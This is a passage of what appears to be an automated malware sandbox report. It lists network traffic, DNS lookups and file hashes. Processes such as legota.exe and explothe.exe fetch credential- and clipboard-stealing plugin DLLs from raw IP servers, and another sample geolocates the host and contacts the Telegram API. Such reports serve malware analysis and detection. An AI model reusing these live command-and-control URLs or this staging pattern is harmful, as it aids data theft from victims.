                                                  https://facebook.com/security/hsts-pixel.gif?c=3.2
                                                  tls, http
                                                  IEXPLORE.EXE
                                                  958 B
                                                  4.1kB
                                                  7
                                                  8

                                                  HTTP Request

                                                  GET https://facebook.com/security/hsts-pixel.gif?c=3.2

                                                  HTTP Response

                                                  302
                                                • 157.240.201.35:443
                                                  facebook.com
                                                  tls
                                                  IEXPLORE.EXE
                                                  565 B
                                                  3.6kB
                                                  6
                                                  7
                                                • 157.240.201.15:443
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yS/r/8Y1pHPyESqG.js?_nc_x=Ij3Wp8lg5Kz
                                                  tls, http
                                                  IEXPLORE.EXE
                                                  5.2kB
                                                  99.8kB
                                                  51
                                                  80

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/y9/l/0,cross/g6qk785LM34.css?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/0,cross/yotEdcUw9Gj.css?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yI/r/8iBPf52GdU5.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yk/r/kg_LcWkMBGy.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yb/r/TPdUEkA5C5u.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/ym/r/R_qswDMOLWA.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yS/r/8Y1pHPyESqG.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200
                                                • 157.240.201.15:443
                                                  https://static.xx.fbcdn.net/rsrc.php/v3iqES4/yQ/l/en_US/riV0sq4fGtL.js?_nc_x=Ij3Wp8lg5Kz
                                                  tls, http
                                                  IEXPLORE.EXE
                                                  4.7kB
                                                  49.9kB
                                                  32
                                                  45

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yX/l/0,cross/srbvjPu5q9v.css?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yu/l/0,cross/wMWvCV-I6Hn.css?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yA/r/gYsh5OsZKde.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/ye/r/yUtEQ4ajXZI.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yF/r/gb_2sOlx922.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yJ/r/_i_bZ2JArcF.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yo/r/j5B70NmINXl.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3iqES4/yQ/l/en_US/riV0sq4fGtL.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200
                                                • 157.240.201.15:443
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yn/r/FQIPxzEyFvX.js?_nc_x=Ij3Wp8lg5Kz
                                                  tls, http
                                                  IEXPLORE.EXE
                                                  4.7kB
                                                  54.2kB
                                                  34
                                                  51

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/y9/l/0,cross/2W2z89vRC58.css?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yS/l/0,cross/WmItEcPXNHF.css?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/ys/r/_f5wO_K1viW.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yt/r/d4QqVJOdC1V.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yF/r/p55HfXW__mM.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yb/r/X98p6omdveu.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/y2/r/Szq51TCr-iX.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yn/r/FQIPxzEyFvX.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200
                                                • 157.240.201.15:443
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/_tJ17sGyxOX.js?_nc_x=Ij3Wp8lg5Kz
                                                  tls, http
                                                  IEXPLORE.EXE
                                                  5.1kB
                                                  49.8kB
                                                  34
                                                  47

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/y6/l/0,cross/xx_kouuGNk2.css?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/y5/l/0,cross/DB8Huzq8P9n.css?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yH/l/0,cross/jszcM5LFidI.css?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yU/r/O7nelmd9XSI.png

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/y1/r/dXk5exdOVhk.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yn/r/pukjd1lDNzh.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yr/r/6XlDJXhMTmo.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/y0/r/1Wa4Bq8ekru.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/_tJ17sGyxOX.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200
                                                • 157.240.201.15:443
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yt/r/jIUN0Hn2kpD.js?_nc_x=Ij3Wp8lg5Kz
                                                  tls, http
                                                  IEXPLORE.EXE
                                                  5.9kB
                                                  82.2kB
                                                  46
                                                  71

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yf/l/0,cross/Vgv8SHTD4rI.css?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/yI/r/4aAhOWlwaXf.svg

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3i7M54/yn/l/en_US/WW_dM8tCcty.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yB/r/Y0L6f5sxdIV.png

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yj/r/5ZTMade4JZA.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yF/r/FLJXkx8ys-6.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3iPwL4/yi/l/en_US/AAnuEkJqILS.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yG/r/K3qKc0LZC6p.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yt/r/jIUN0Hn2kpD.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200
                                                • 157.240.201.15:443
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yZ/r/x4Eyp9nQ1uk.js?_nc_x=Ij3Wp8lg5Kz
                                                  tls, http
                                                  IEXPLORE.EXE
                                                  6.3kB
                                                  164.5kB
                                                  76
                                                  128

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yc/l/0,cross/1FPNULrhhBJ.css?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yL/r/C7x9HQY1590.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yh/r/bpW4eEg-2_W.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yd/r/D8yA-TXiNuk.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yf/r/LgvwffuKmeX.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3i8JF4/yC/l/en_US/o1mLpHNkgsi.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://static.xx.fbcdn.net/rsrc.php/v3/yZ/r/x4Eyp9nQ1uk.js?_nc_x=Ij3Wp8lg5Kz

                                                  HTTP Response

                                                  200
                                                • 157.240.201.35:443
                                                  https://fbcdn.net/security/hsts-pixel.gif?c=2
                                                  tls, http
                                                  IEXPLORE.EXE
                                                  1.1kB
                                                  5.0kB
                                                  8
                                                  9

                                                  HTTP Request

                                                  GET https://fbcdn.net/security/hsts-pixel.gif?c=2

                                                  HTTP Response

                                                  302
                                                • 157.240.201.35:443
                                                  fbcdn.net
                                                  tls
                                                  IEXPLORE.EXE
                                                  586 B
                                                  3.9kB
                                                  6
                                                  7
                                                • 157.240.201.35:443
                                                  fbsbx.com
                                                  tls
                                                  IEXPLORE.EXE
                                                  586 B
                                                  3.9kB
                                                  6
                                                  7
                                                • 157.240.201.35:443
                                                  https://fbsbx.com/security/hsts-pixel.gif
                                                  tls, http
                                                  IEXPLORE.EXE
                                                  993 B
                                                  5.4kB
                                                  7
                                                  9

                                                  HTTP Request

                                                  GET https://fbsbx.com/security/hsts-pixel.gif

                                                  HTTP Response

                                                  200
                                                • 157.240.247.35:443
                                                  https://www.facebook.com/images/cookies/cookie_info_popup_image_1.png
                                                  tls, http
                                                  IEXPLORE.EXE
                                                  1.8kB
                                                  53.6kB
                                                  25
                                                  43

                                                  HTTP Request

                                                  GET https://www.facebook.com/images/cookies/cookie_info_popup_image_1.png

                                                  HTTP Response

                                                  200
                                                • 157.240.247.35:443
                                                  https://www.facebook.com/images/cookies/cookie_info_popup_image_3.png
                                                  tls, http
                                                  IEXPLORE.EXE
                                                  1.8kB
                                                  50.7kB
                                                  25
                                                  40

                                                  HTTP Request

                                                  GET https://www.facebook.com/images/cookies/cookie_info_popup_image_3.png

                                                  HTTP Response

                                                  200
                                                • 157.240.247.35:443
                                                  https://www.facebook.com/images/cookies/cookie_info_popup_image_4.png
                                                  tls, http
                                                  IEXPLORE.EXE
                                                  1.5kB
                                                  40.9kB
                                                  20
                                                  34

                                                  HTTP Request

                                                  GET https://www.facebook.com/images/cookies/cookie_info_popup_image_4.png

                                                  HTTP Response

                                                  200
                                                • 157.240.247.35:443
                                                  https://www.facebook.com/images/cookies/cookie_info_popup_image_2.png
                                                  tls, http
                                                  IEXPLORE.EXE
                                                  1.7kB
                                                  50.5kB
                                                  23
                                                  40

                                                  HTTP Request

                                                  GET https://www.facebook.com/images/cookies/cookie_info_popup_image_2.png

                                                  HTTP Response

                                                  200
                                                • 142.250.179.206:443
                                                  https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1256097051&timestamp=1696680164550
                                                  tls, http
                                                  IEXPLORE.EXE
                                                  2.1kB
                                                  23.6kB
                                                  20
                                                  22

                                                  HTTP Request

                                                  GET https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1256097051&timestamp=1696680164550

                                                  HTTP Response

                                                  200
                                                • 142.250.179.206:443
                                                  accounts.youtube.com
                                                  tls
                                                  IEXPLORE.EXE
                                                  665 B
                                                  7.2kB
                                                  8
                                                  9
                                                • 142.251.36.14:443
                                                  https://play.google.com/log?format=json&hasfast=true&authuser=0
                                                  tls, http
                                                  IEXPLORE.EXE
                                                  4.6kB
                                                  10.2kB
                                                  15
                                                  17

                                                  HTTP Request

                                                  POST https://play.google.com/log?format=json&hasfast=true&authuser=0

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  POST https://play.google.com/log?format=json&hasfast=true&authuser=0

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  POST https://play.google.com/log?format=json&hasfast=true&authuser=0

                                                  HTTP Response

                                                  200
                                                • 77.91.124.1:80
                                                  http://77.91.124.1/theme/Plugins/clip64.dll
                                                  http
                                                  explothe.exe
                                                  3.9kB
                                                  103.3kB
                                                  75
                                                  82

                                                  HTTP Request

                                                  GET http://77.91.124.1/theme/Plugins/cred64.dll

                                                  HTTP Response

                                                  404

                                                  HTTP Request

                                                  GET http://77.91.124.1/theme/Plugins/clip64.dll

                                                  HTTP Response

                                                  200
                                                • 77.91.68.78:80
                                                  http://77.91.68.78/help/Plugins/clip64.dll
                                                  http
                                                  legota.exe
                                                  4.3kB
                                                  95.0kB
                                                  75
                                                  76

                                                  HTTP Request

                                                  GET http://77.91.68.78/help/Plugins/cred64.dll

                                                  HTTP Response

                                                  404

                                                  HTTP Request

                                                  GET http://77.91.68.78/help/Plugins/clip64.dll

                                                  HTTP Response

                                                  200
                                                • 104.18.115.97:80
                                                  http://icanhazip.com/
                                                  http
                                                  pf1sbMGHARiKj7J.exe
                                                  253 B
                                                  1.2kB
                                                  4
                                                  4

                                                  HTTP Request

                                                  GET http://icanhazip.com/

                                                  HTTP Response

                                                  200
                                                • 104.21.44.66:443
                                                  https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=66:2e:76:02:65:c2
                                                  tls, http
                                                  pf1sbMGHARiKj7J.exe
                                                  827 B
                                                  5.7kB
                                                  9
                                                  9

                                                  HTTP Request

                                                  GET https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=66:2e:76:02:65:c2

                                                  HTTP Response

                                                  200
                                                • 149.154.167.220:443
                                                  api.telegram.org
                                                  tls
                                                  pf1sbMGHARiKj7J.exe
                                                  388 B
                                                  219 B
                                                  5
                                                  5
                                                • 149.154.167.220:443
                                                  api.telegram.org
                                                  tls
                                                  pf1sbMGHARiKj7J.exe
                                                  388 B
                                                  219 B
                                                  5
                                                  5
                                                • 127.0.0.1:7707
                                                  pf1sbMGHARiKj7J.exe
                                                • 204.79.197.200:443
                                                  ieonline.microsoft.com
                                                  tls
                                                  iexplore.exe
                                                  747 B
                                                  7.8kB
                                                  9
                                                  12
                                                • 204.79.197.200:443
                                                  ieonline.microsoft.com
                                                  tls
                                                  iexplore.exe
                                                  747 B
                                                  7.8kB
                                                  9
                                                  12
                                                • 204.79.197.200:443
                                                  ieonline.microsoft.com
                                                  iexplore.exe
                                                  152 B
                                                  3
                                                • 127.0.0.1:7707
                                                  pf1sbMGHARiKj7J.exe
                                                • 127.0.0.1:7707
                                                  pf1sbMGHARiKj7J.exe
                                                • 127.0.0.1:6606
                                                  pf1sbMGHARiKj7J.exe
                                                • 204.79.197.200:443
                                                  ieonline.microsoft.com
                                                  tls
                                                  iexplore.exe
                                                  831 B
                                                  7.9kB
                                                  10
                                                  13
                                                • 127.0.0.1:6606
                                                  pf1sbMGHARiKj7J.exe
                                                • 127.0.0.1:8808
                                                  pf1sbMGHARiKj7J.exe
                                                • 8.8.8.8:53
                                                  accounts.google.com
                                                  dns
                                                  IEXPLORE.EXE
                                                  65 B
                                                  81 B
                                                  1
                                                  1

                                                  DNS Request

                                                  accounts.google.com

                                                  DNS Response

                                                  142.250.179.141

                                                • 8.8.8.8:53
                                                  transfer.sh
                                                  dns
                                                  legota.exe
                                                  57 B
                                                  73 B
                                                  1
                                                  1

                                                  DNS Request

                                                  transfer.sh

                                                  DNS Response

                                                  144.76.136.153

                                                • 8.8.8.8:53
                                                  apps.identrust.com
                                                  dns
                                                  legota.exe
                                                  64 B
                                                  165 B
                                                  1
                                                  1

                                                  DNS Request

                                                  apps.identrust.com

                                                  DNS Response

                                                  2.18.121.68
                                                  2.18.121.70

                                                • 8.8.8.8:53
                                                  www.facebook.com
                                                  dns
                                                  IEXPLORE.EXE
                                                  62 B
                                                  107 B
                                                  1
                                                  1

                                                  DNS Request

                                                  www.facebook.com

                                                  DNS Response

                                                  157.240.247.35

                                                • 8.8.8.8:53
                                                  static.xx.fbcdn.net
                                                  dns
                                                  IEXPLORE.EXE
                                                  65 B
                                                  104 B
                                                  1
                                                  1

                                                  DNS Request

                                                  static.xx.fbcdn.net

                                                  DNS Response

                                                  157.240.201.15

                                                • 8.8.8.8:53
                                                  facebook.com
                                                  dns
                                                  IEXPLORE.EXE
                                                  58 B
                                                  74 B
                                                  1
                                                  1

                                                  DNS Request

                                                  facebook.com

                                                  DNS Response

                                                  157.240.201.35

                                                • 8.8.8.8:53
                                                  fbcdn.net
                                                  dns
                                                  IEXPLORE.EXE
                                                  55 B
                                                  71 B
                                                  1
                                                  1

                                                  DNS Request

                                                  fbcdn.net

                                                  DNS Response

                                                  157.240.201.35

                                                • 8.8.8.8:53
                                                  fbsbx.com
                                                  dns
                                                  IEXPLORE.EXE
                                                  55 B
                                                  71 B
                                                  1
                                                  1

                                                  DNS Request

                                                  fbsbx.com

                                                  DNS Response

                                                  157.240.201.35

                                                • 8.8.8.8:53
                                                  accounts.youtube.com
                                                  dns
                                                  IEXPLORE.EXE
                                                  66 B
                                                  110 B
                                                  1
                                                  1

                                                  DNS Request

                                                  accounts.youtube.com

                                                  DNS Response

                                                  142.250.179.206

                                                • 8.8.8.8:53
                                                  play.google.com
                                                  dns
                                                  IEXPLORE.EXE
                                                  61 B
                                                  77 B
                                                  1
                                                  1

                                                  DNS Request

                                                  play.google.com

                                                  DNS Response

                                                  142.251.36.14

                                                • 8.8.8.8:53
                                                  icanhazip.com
                                                  dns
                                                  pf1sbMGHARiKj7J.exe
                                                  59 B
                                                  91 B
                                                  1
                                                  1

                                                  DNS Request

                                                  icanhazip.com

                                                  DNS Response

                                                  104.18.115.97
                                                  104.18.114.97

                                                • 8.8.8.8:53
                                                  api.mylnikov.org
                                                  dns
                                                  pf1sbMGHARiKj7J.exe
                                                  62 B
                                                  94 B
                                                  1
                                                  1

                                                  DNS Request

                                                  api.mylnikov.org

                                                  DNS Response

                                                  104.21.44.66
                                                  172.67.196.114

                                                • 8.8.8.8:53
                                                  www.microsoft.com
                                                  dns
                                                  pf1sbMGHARiKj7J.exe
                                                  63 B
                                                  230 B
                                                  1
                                                  1

                                                  DNS Request

                                                  www.microsoft.com

                                                  DNS Response

                                                  104.85.1.163

                                                • 8.8.8.8:53
                                                  api.telegram.org
                                                  dns
                                                  pf1sbMGHARiKj7J.exe
                                                  62 B
                                                  78 B
                                                  1
                                                  1

                                                  DNS Request

                                                  api.telegram.org

                                                  DNS Response

                                                  149.154.167.220

                                                MITRE ATT&CK Enterprise v15

                                                Replay Monitor

                                                Loading Replay Monitor...

                                                Downloads

                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

                                                  Filesize

                                                  914B

                                                  MD5

                                                  e4a68ac854ac5242460afd72481b2a44

                                                  SHA1

                                                  df3c24f9bfd666761b268073fe06d1cc8d4f82a4

                                                  SHA256

                                                  cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f

                                                  SHA512

                                                  5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

                                                  Filesize

                                                  252B

                                                  MD5

                                                  c02f8dfd199a9085315ee0bbfba35082

                                                  SHA1

                                                  59b10ec7a05e39a7989fef2d3780e8b8ed7426ef

                                                  SHA256

                                                  88746dc4938abfa8fc0f090180459045761b04784a3d54e7dd9889880c2a9d6b

                                                  SHA512

                                                  921a65a0081debb6800a3d0f479ba1b290ea5d3d9b6cd06121244055cc9481e494c34277174098e120543106a415b37188235988a9d09a7e95a478c296567173

                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                  Filesize

                                                  344B

                                                  MD5

                                                  9b6936739f09b76abf0705cfb069f149

                                                  SHA1

                                                  65c8bb7e538cdfef41f1e8266e4963095f682574

                                                  SHA256

                                                  f091dc333c1e21ba149cb63971ae82d9d9e787b8a5d37479152192b69bfd2d67

                                                  SHA512

                                                  e77f660907c3af4f5e5e9cc16bb574e86f447acfbc5db9ba3562e385a8698225fc4d88010d13f08b678fd5bcdc79f58d87b1abe6ec5cbb5b63fac41adbe5e6ee

                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                  Filesize

                                                  344B

                                                  MD5

                                                  352f997d7f5a1d9411cdb7b8a845477a

                                                  SHA1

                                                  d101a82b5daec41689aa61bc60c6d54bcc04b01e

                                                  SHA256

                                                  3c3e2f1aa8051156cd1df102cc95af3756afd244943e7aef5f60b13862454a4e

                                                  SHA512

                                                  05c038c4ba3b70a339d05baae038d2edb079b9a24ecd43b9ebaf7e266d0d6b6fc4ba21ff5aeee5c08b04c8dd7f4fb562364ddfbc37b3b373e0867ca2fe44b8b4

                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                  Filesize

                                                  344B

                                                  MD5

                                                  bc754e16653d6d7f73a28bb818c7d030

                                                  SHA1

                                                  35aa38e6b36a034af2deda9bbc15d57c3fcf41b6

                                                  SHA256

                                                  476faaf78e4e2e90f5d3ec802e523955d849143d1437db559e9141fff6fd792d

                                                  SHA512

                                                  26a1bd17ac3e47d538a27b213a7b5a31174a50bac03c0fb63ba8bbfb8c850a4fdd58fd6487bd8ef93aa683f228aa0748f649e9b200076008ebdf678b81202389

                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                  Filesize

                                                  344B

                                                  MD5

                                                  39ecc0e62ac983b5e4e5b25e593797eb

                                                  SHA1

                                                  b6737f88497b909d15fd73f125d4546c1680d14e

                                                  SHA256

                                                  b88a9515a1111725ad7e7b8cd90397ffce5f7ccee92c59ebecc395e687d4a5e0

                                                  SHA512

                                                  e0123ad2313cb70cbfba8f1cd61fe640fa5e33dd12c6b55129adc3f9bee90163dc942c8cb61053fe603ef775441c941724d5f992229911001c71564960ba2e5b

                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                  Filesize

                                                  344B

                                                  MD5

                                                  43ec20f235787a51d3cd2cb0a5a9d473

                                                  SHA1

                                                  a01c68861a9c1f2ac9e685e9cb7dcb62e12b5340

                                                  SHA256

                                                  5d1da3ba0b63131fb0983602da1b97ff7c8e68341148c667e74c20b49ee1f276

                                                  SHA512

                                                  6fb1e4fe46b9a6abeb5858e08b88cec09be13ff0be0413b2fad69ee638953603bfd43ca3adb6cbf33d176a7d7e545769f36d878791268c352ea3aebd7920cb39

                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                  Filesize

                                                  344B

                                                  MD5

                                                  abe20551cbf1a38c91137c18602f6281

                                                  SHA1

                                                  32116806dcde0cbbcbc09de7571ba4d7ed5a57a8

                                                  SHA256

                                                  fd1de20780cac685b1be8787ac029b5682829cf371f537b1532fe065aa587fc5

                                                  SHA512

                                                  e7d7bc0175eb17eae0c08b5a8b9a9bd1ac7760ec80bc2cc037be05798c940f3c16152ed811323158d1a9b5e47e864377412c97134eb861f701dfa94e568b0367

                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                  Filesize

                                                  344B

                                                  MD5

                                                  47d0f04189dbd9fd867b27abc87390f3

                                                  SHA1

                                                  aef685ee78d39a37aaf80c0867337a57e36ffb9c

                                                  SHA256

                                                  3eb1b4225410b386a0ec7e1c8189829e8588cb75758c28c60dd3390c61a30ee1

                                                  SHA512

                                                  fe569deaada4079147661af04418dd06ea670768d261b89c230edd8cf9cefa86195161f4bd7b75d26258e0e58cd0da9ceeefac6ce38f2a039a66eaf213445e0a

                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                  Filesize

                                                  344B

                                                  MD5

                                                  3e23134860f335c607a692debd53c7be

                                                  SHA1

                                                  70185b2c8c4dd803e3ab32e367406a7482bf67d4

                                                  SHA256

                                                  913f2fcd7ffd91aa29bc0351d9ee0aa0ac1cc39c60b6bcc3375f55f0547bbbc0

                                                  SHA512

                                                  6d5e5e8c6a40836798a888554ccd95797153a6e0d503b7c9b4d6c22e66b49cedc6f622012839de2d58a7f16528044a13871c8ae408a1b97506e9be7c7b4e5fa0

                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                  Filesize

                                                  344B

                                                  MD5

                                                  23381dd359fb6d3a151a22d031ae9641

                                                  SHA1

                                                  23267671b0a0b68f8513e3700bf47b8470ac43ec

                                                  SHA256

                                                  c18b3def3d81a23238c605e45781f4f98aaefdabacc3c77c3a3b1909e698ccef

                                                  SHA512

                                                  25465ffb08c52bcdc56e5edb6d13db88aacad267f6e1eb1f636b35f753917d02010668feee4612f99cf0bd4482208d4c38c781e478e7b7d224fe021be882e961

                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                  Filesize

                                                  344B

                                                  MD5

                                                  23381dd359fb6d3a151a22d031ae9641

                                                  SHA1

                                                  23267671b0a0b68f8513e3700bf47b8470ac43ec

                                                  SHA256

                                                  c18b3def3d81a23238c605e45781f4f98aaefdabacc3c77c3a3b1909e698ccef

                                                  SHA512

                                                  25465ffb08c52bcdc56e5edb6d13db88aacad267f6e1eb1f636b35f753917d02010668feee4612f99cf0bd4482208d4c38c781e478e7b7d224fe021be882e961

                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                  Filesize

                                                  344B

                                                  MD5

                                                  23381dd359fb6d3a151a22d031ae9641

                                                  SHA1

                                                  23267671b0a0b68f8513e3700bf47b8470ac43ec

                                                  SHA256

                                                  c18b3def3d81a23238c605e45781f4f98aaefdabacc3c77c3a3b1909e698ccef

                                                  SHA512

                                                  25465ffb08c52bcdc56e5edb6d13db88aacad267f6e1eb1f636b35f753917d02010668feee4612f99cf0bd4482208d4c38c781e478e7b7d224fe021be882e961

